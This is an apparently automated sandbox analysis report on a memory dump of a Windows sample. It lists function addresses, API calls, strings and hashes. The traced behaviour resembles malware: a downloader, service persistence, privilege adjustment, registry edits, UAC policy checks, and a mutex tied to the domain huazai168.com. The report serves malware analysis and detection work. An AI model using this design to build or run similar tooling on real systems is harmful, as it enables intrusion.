Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$CountMutexSleepTicklstrcat$CreateErrorH_prologHandleLastObjectOpenReleaseSingleWait_randlstrcpystrcmpwsprintf
String ID: %s:%d:%s$Console$Default$Groupfenzhu$MarkTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\$huazai168.com
API String ID: 2892932112-1296324176
Opcode ID: 671cdbf621f4fae39b1ea745e579cce1c2c1a67e7c8d9356b4fab218b0ef969f
Instruction ID: f07048f33be701b930d3a91a5ce24ebf8701faf5a19eb132ca921cd8d456bba5
Opcode Fuzzy Hash: 671cdbf621f4fae39b1ea745e579cce1c2c1a67e7c8d9356b4fab218b0ef969f
Instruction Fuzzy Hash: ADA18F72E00259BBEF21DBA0DD58AEE7BBCEF04359F1001A5E509E2540EB74AE44CF61

Function 04D74FA7 Relevance: 43.8, APIs: 3, Strings: 22, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,7508EA50), ref: 04D74FB5
wsprintfA.USER32 ref: 04D75056
lstrlenA.KERNEL32(?,00000000), ref: 04D7508C

Part of subcall function 04D79423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,04D9CB7A,?,00000000,04D7ADE0,04D8E538,000000FF,?,04D756BE,80000001,Console,Groupfenzhu,00000001,04D9CB7A), ref: 04D79450
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 04D79467
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 04D79472
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 04D7947D
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 04D79488
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04D79493
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04D7949E
Part of subcall function 04D79423: FreeLibrary.KERNEL32(00000000,?,00000000,04D7ADE0,04D8E538,000000FF,?,04D756BE,80000001,Console,Groupfenzhu,00000001), ref: 04D79592

Strings

MarkTime, xrefs: 04D7509A, 04D7509F
%, xrefs: 04D7501E
2, xrefs: 04D7504E
%4d-, xrefs: 04D74FFF, 04D75002
%, xrefs: 04D75032
2, xrefs: 04D7503A
%, xrefs: 04D75046
:, xrefs: 04D75042
., xrefs: 04D75036
2, xrefs: 04D75026
., xrefs: 04D7504A
d, xrefs: 04D75052
d, xrefs: 04D75016
d, xrefs: 04D7503E
d, xrefs: 04D7502A
%, xrefs: 04D7500A
., xrefs: 04D75022
-, xrefs: 04D7501A
., xrefs: 04D7500E
Console, xrefs: 04D750A0
2, xrefs: 04D75012
, xrefs: 04D7502E

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadLocalTimelstrlenwsprintf
String ID: $%$%$%$%$%4d-$-$.$.$.$.$2$2$2$2$:$Console$MarkTime$d$d$d$d
API String ID: 1129135643-4086575212
Opcode ID: 92538e08c65d9cbdb981cfec0eca967e38a4bd251150beac8cc24f165e151877
Instruction ID: ad1a1ea7a1f3eb4c9d62e4e16c0d632def51234f6593ca10e07977ca79c79b6f
Opcode Fuzzy Hash: 92538e08c65d9cbdb981cfec0eca967e38a4bd251150beac8cc24f165e151877
Instruction Fuzzy Hash: 7E410261C082D8E9EF12D7E8D8097EEBFF95B15708F0440C9E584B6282D6FA4758C776

Function 04D76316 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 169filelibraryloaderCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,04D744DD,00000000,00000001), ref: 04D76344
LoadLibraryA.KERNEL32(wininet.dll), ref: 04D76357
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 04D7636E
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 04D7638E
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 04D7639A
FreeLibrary.KERNEL32(00000000), ref: 04D763BC
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04D763D9
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 04D76409
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04D76496
CloseHandle.KERNEL32(?), ref: 04D764A8
Sleep.KERNEL32(00000001), ref: 04D764B3
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04D764BF
FreeLibrary.KERNEL32(00000000), ref: 04D764D2
CopyFileA.KERNEL32(?,?,00000000), ref: 04D764E3
CloseHandle.KERNEL32(?), ref: 04D764F3
DeleteFileA.KERNEL32(?), ref: 04D76500

Strings

InternetOpenA, xrefs: 04D76365
404, xrefs: 04D76422
%s1, xrefs: 04D7632F
InternetReadFile, xrefs: 04D76401
MSIE 6.0, xrefs: 04D76374
InternetOpenUrlA, xrefs: 04D76394
wininet.dll, xrefs: 04D7634C
InternetCloseHandle, xrefs: 04D764B9

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$AddressProc$Library$CloseDeleteFreeHandle$ConnectCopyCreateInternetLoadSleepWrite
String ID: %s1$404$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1518507476-3861321592
Opcode ID: f31b13169ef8c93010a5d1fa2f3061b184ada698527e58b09bbb47940411b732
Instruction ID: 611cff579d4a3d2181c88b52f8076d7015e1a9bf276b97fdaa683d88b280943d
Opcode Fuzzy Hash: f31b13169ef8c93010a5d1fa2f3061b184ada698527e58b09bbb47940411b732
Instruction Fuzzy Hash: 8E514EB290011DBFEF109FA0DC89EEE7BBDEB48258F104469F505E2150EA74AE859F60

Function 04D78FF7 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,04D739FA,SeShutdownPrivilege,00000001,?,04D7200F,?), ref: 04D7900F
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04D7901F
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04D7902A
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04D79035
LoadLibraryA.KERNEL32(kernel32.dll,?,04D739FA,SeShutdownPrivilege,00000001,?,04D7200F,?), ref: 04D7903F
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04D7904A
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04D79092
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04D7909A
CloseHandle.KERNEL32(?), ref: 04D790A9
FreeLibrary.KERNEL32(00000000), ref: 04D790BA
FreeLibrary.KERNEL32(00000000), ref: 04D790C5

Strings

LookupPrivilegeValueA, xrefs: 04D7902C
GetLastError, xrefs: 04D79094
KERNEL32.dll, xrefs: 04D7908D
GetCurrentProcess, xrefs: 04D79041
ADVAPI32.dll, xrefs: 04D79006
OpenProcessToken, xrefs: 04D79019
kernel32.dll, xrefs: 04D79037
AdjustTokenPrivileges, xrefs: 04D79021
SeShutdownPrivilege, xrefs: 04D78FFE

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseHandle
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
API String ID: 2887716753-2040270271
Opcode ID: 1723d3b38ec288f88db07d57f04d4e03aca1c7df2060aae09fdd6b9868c093db
Instruction ID: 53d5c6b79ac50ee342ad27fde02dde0524e758a7509f79ef2e0dd33cdcbe3e27
Opcode Fuzzy Hash: 1723d3b38ec288f88db07d57f04d4e03aca1c7df2060aae09fdd6b9868c093db
Instruction Fuzzy Hash: 8D212CB1E50219BAEF10ABF58C49FEEBFB8EF08600F004455E500E2181DAB4AA45CFA1

Function 04D758AD Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 116sleepregistryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(04D9CA80,04D759C2), ref: 04D758C3
SetServiceStatus.ADVAPI32(00000000,04DA3118), ref: 04D75913
Sleep.KERNEL32(000001F4), ref: 04D75921
GetVersionExA.KERNEL32(?), ref: 04D75938
SetServiceStatus.ADVAPI32(04DA3118), ref: 04D75958

Part of subcall function 04D7571E: CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,huazai168.com,04D9CC34,04D76CAB), ref: 04D75729
Part of subcall function 04D7571E: GetLastError.KERNEL32 ref: 04D75731
Part of subcall function 04D7571E: CloseHandle.KERNEL32(00000000), ref: 04D7573F

Sleep.KERNEL32(0000003C), ref: 04D75961
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D75977
wsprintfA.USER32 ref: 04D75990
CloseHandle.KERNEL32(00000000), ref: 04D759A6
SetServiceStatus.ADVAPI32(04DA3118), ref: 04D759B9
SetServiceStatus.ADVAPI32(04DA3118,04DA3118,750904E0,00000001,00000000), ref: 04D759FF
Sleep.KERNEL32(000001F4), ref: 04D75A06
SetServiceStatus.ADVAPI32(04DA3118), ref: 04D75A20
SetServiceStatus.ADVAPI32(04DA3118,04DA3118,750904E0,00000001,00000000), ref: 04D75A43
Sleep.KERNEL32(000001F4), ref: 04D75A4A
SetServiceStatus.ADVAPI32(04DA3118,04DA3118,750904E0,00000001,00000000), ref: 04D75A7E
Sleep.KERNEL32(000001F4), ref: 04D75A85

Strings

%s Win7, xrefs: 04D7598A

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Service$Status$Sleep$CloseHandle$CreateCtrlErrorFileHandlerLastModuleMutexNameRegisterVersionwsprintf
String ID: %s Win7
API String ID: 2853745164-511819196
Opcode ID: af034dab21d425858f7841671ac684a4b54b55e49116b9ad62d2ca4165f0e9a4
Instruction ID: 9f157a13f8fdd5aa293b585a9640147de0bfcc7d479f4b323d2ce8385fbd194e
Opcode Fuzzy Hash: af034dab21d425858f7841671ac684a4b54b55e49116b9ad62d2ca4165f0e9a4
Instruction Fuzzy Hash: 45417F71910204AFE7109F51EC6EBA67BFAE70571AF00401DEA08963C0D7BC6DA5CF66

Function 04D8956B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170stringCOMMON

Download Yara Rule

APIs

Part of subcall function 04D8C82F: TlsGetValue.KERNEL32(00000000,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?,?,00000100), ref: 04D8C86E

CallNextHookEx.USER32(?,00000003,?,?), ref: 04D89595
GetClassLongA.USER32(?,000000E6), ref: 04D895DC
GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,04D8C4D2), ref: 04D89608
lstrcmpiA.KERNEL32(?,ime), ref: 04D89617
GetWindowLongA.USER32(?,000000FC), ref: 04D8968A
SetWindowLongA.USER32(?,000000FC,00000000), ref: 04D896AB

Strings

ime, xrefs: 04D89611
AfxOldWndProc423, xrefs: 04D896EC, 04D896F1, 04D896FC, 04D89704, 04D8970D

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: b3d53c73b8b515ba924055108a2851f65bf1ce78245d2e32ad749ee3496d56b2
Instruction ID: c1c9def95772f37d491c69400d9258fc4266d61ea3fb70727876b78991066217
Opcode Fuzzy Hash: b3d53c73b8b515ba924055108a2851f65bf1ce78245d2e32ad749ee3496d56b2
Instruction Fuzzy Hash: 07518DB1600225ABDB21BF64DC68B7E3BA8FF05765F10469CF895E6290D734E940DFA0

Function 04D79423 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,04D9CB7A,?,00000000,04D7ADE0,04D8E538,000000FF,?,04D756BE,80000001,Console,Groupfenzhu,00000001,04D9CB7A), ref: 04D79450
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 04D79467
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 04D79472
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 04D7947D
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 04D79488
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04D79493
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04D7949E
FreeLibrary.KERNEL32(00000000,?,00000000,04D7ADE0,04D8E538,000000FF,?,04D756BE,80000001,Console,Groupfenzhu,00000001), ref: 04D79592

Strings

RegOpenKeyExA, xrefs: 04D7948D
ADVAPI32.dll, xrefs: 04D7944B
Console, xrefs: 04D79445
RegCreateKeyExA, xrefs: 04D7945B
RegDeleteKeyA, xrefs: 04D79477
RegCloseKey, xrefs: 04D79498
RegDeleteValueA, xrefs: 04D79482
RegSetValueExA, xrefs: 04D7946C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: ADVAPI32.dll$Console$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
API String ID: 2449869053-4282833508
Opcode ID: d83e3da911b0880f655ea5e4bde7f95846cec0fc504e361f2b49daf1d293abc2
Instruction ID: ca993cdee04450731a088db4e06acb8ca7438db72d33d1a83a17880d5a1b298e
Opcode Fuzzy Hash: d83e3da911b0880f655ea5e4bde7f95846cec0fc504e361f2b49daf1d293abc2
Instruction Fuzzy Hash: 634118B2900229BFEF119FA4DC99EBEBFB8FB08654F004169F910E2150E771AD009F60

Function 04D791B3 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 183libraryloaderstringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793CF
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

Strings

RegOpenKeyExA, xrefs: 04D79233
%08X, xrefs: 04D7938F
RegEnumValueA, xrefs: 04D79243
RegQueryValueExA, xrefs: 04D79222
ADVAPI32.dll, xrefs: 04D79211
RegCloseKey, xrefs: 04D7925D
RegEnumKeyExA, xrefs: 04D79250

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadlstrcpy
String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 2888591476-2913591164
Opcode ID: 2a6c7bc286068700d0f8b9d73b84cd4a9776af17cd0a7905e45bad562045fe58
Instruction ID: d3e44809eb930167d70b2d49070545956bad25106ee7a93e80615c86a3072238
Opcode Fuzzy Hash: 2a6c7bc286068700d0f8b9d73b84cd4a9776af17cd0a7905e45bad562045fe58
Instruction Fuzzy Hash: 3561DBB290021DAFEF21DFA0DC54EEEBBB9FB08714F0005A6F515A2150E775AE548F60

Function 04D78ADE Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 174libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 04D78B17
GetProcAddress.KERNEL32(00000000,socket), ref: 04D78B2C
GetProcAddress.KERNEL32(?,recv), ref: 04D78B39
GetProcAddress.KERNEL32(?,connect), ref: 04D78B46
GetProcAddress.KERNEL32(?,getsockname), ref: 04D78B53
GetProcAddress.KERNEL32(?,select), ref: 04D78B60
GetLastError.KERNEL32(00000000), ref: 04D78B9D
WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,?,00000010), ref: 04D78C38
GetLastError.KERNEL32(?,?,?,?,?,00000010), ref: 04D78CA2
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 04D78CD3

Strings

getsockname, xrefs: 04D78B48
select, xrefs: 04D78B55
recv, xrefs: 04D78B2E
socket, xrefs: 04D78B23
ws2_32.dll, xrefs: 04D78B12
connect, xrefs: 04D78B3B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLastLibrary$FreeLoadObjectSingleWait
String ID: connect$getsockname$recv$select$socket$ws2_32.dll
API String ID: 1315272698-1466708075
Opcode ID: 070a7868eb8fb86faf73b0e5c7498c5d61fc7cc006fb2a6c6e846b897e270464
Instruction ID: cce3a14a2c4252947c6ac916b1c3f5a8e8aa89eebefa7245523c7631a1751a25
Opcode Fuzzy Hash: 070a7868eb8fb86faf73b0e5c7498c5d61fc7cc006fb2a6c6e846b897e270464
Instruction Fuzzy Hash: 2B612872E00218ABDF21AFA0DC49ADEBFB9EF04315F104155F505E6290E774AA89DFA1

Function 04D8ADCD Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04D8B4CB: GetWindowLongA.USER32(?,000000F0), ref: 04D8B4D7

GetParent.USER32(?), ref: 04D8ADF8
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 04D8AE1B
GetWindowRect.USER32(?,?), ref: 04D8AE34
GetWindowLongA.USER32(00000000,000000F0), ref: 04D8AE47
CopyRect.USER32(?,?), ref: 04D8AE94
CopyRect.USER32(?,?), ref: 04D8AE9E
GetWindowRect.USER32(00000000,?), ref: 04D8AEA7
CopyRect.USER32(?,?), ref: 04D8AEC3

Strings

(, xrefs: 04D8AE5F
@, xrefs: 04D8AE36

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: 238423d75b391c7a01242a6f4b5b14f6c9e2a5d2b4bd0c8e1b2c9bb32038cc99
Instruction ID: 09f1badb7f617df846ae816eba23e61931be3e5ee496bc0a7e50e4e4054c8dff
Opcode Fuzzy Hash: 238423d75b391c7a01242a6f4b5b14f6c9e2a5d2b4bd0c8e1b2c9bb32038cc99
Instruction Fuzzy Hash: 45515E72A00219ABDF11EBA8DC84EBEBBB9EF48714F05451AF905F3281D634FD058B60

Function 04D75AA1 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138registrystringprocessCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 04D75AEA
RegQueryValueA.ADVAPI32(00000000,00000000,?,04D75CD7), ref: 04D75B09
RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 04D75B14
wsprintfA.USER32 ref: 04D75B3C
RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 04D75B5C
RegQueryValueA.ADVAPI32(00000000,00000000,?,04D75CD7), ref: 04D75B93
RegCloseKey.ADVAPI32(00000000), ref: 04D75B98
lstrcatA.KERNEL32(?,04D97D6C), ref: 04D75BDA
lstrcatA.KERNEL32(?,04D75CD7), ref: 04D75BE6
lstrcpyA.KERNEL32(00000000,04D75CD7), ref: 04D75BEE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04D75C27

Strings

WinSta0\Default, xrefs: 04D75C0A
"%1, xrefs: 04D75BA0
D, xrefs: 04D75C01
%s\shell\open\command, xrefs: 04D75B36

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcat$CreateProcesslstrcpywsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 1351118359-33419044
Opcode ID: b25c9c30332baefa84798d8f2c19794a3e6c5021b5881d5a9827d00ad86ee552
Instruction ID: ed3953732764f0c51f402164e3f3e52489e28a01298ba394275eafcb636f0a9d
Opcode Fuzzy Hash: b25c9c30332baefa84798d8f2c19794a3e6c5021b5881d5a9827d00ad86ee552
Instruction Fuzzy Hash: 50412BB2A0011CFBDB119AA0DC45FFF7B7CEB48704F1404AAB605E2140E675AB859FA1

Function 04D77715 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 125stringmemoryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?,00006365), ref: 04D77748
GetCurrentProcess.KERNEL32(00000008,?), ref: 04D77779
OpenProcessToken.ADVAPI32(00000000), ref: 04D77780
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04D777A2
GetLastError.KERNEL32 ref: 04D777A8
LocalAlloc.KERNEL32(00000040,?), ref: 04D777B8
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04D777D1
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04D777D9
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04D777E6
LocalFree.KERNEL32(00000000), ref: 04D777EF
CloseHandle.KERNEL32(?), ref: 04D777FA
lstrcpyA.KERNEL32(?,04D9E16C), ref: 04D77848
lstrcatA.KERNEL32(?,04D9E154), ref: 04D77892

Strings

PromptOnSecureDesktop, xrefs: 04D77859
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 04D7785E

Memory Dump Source

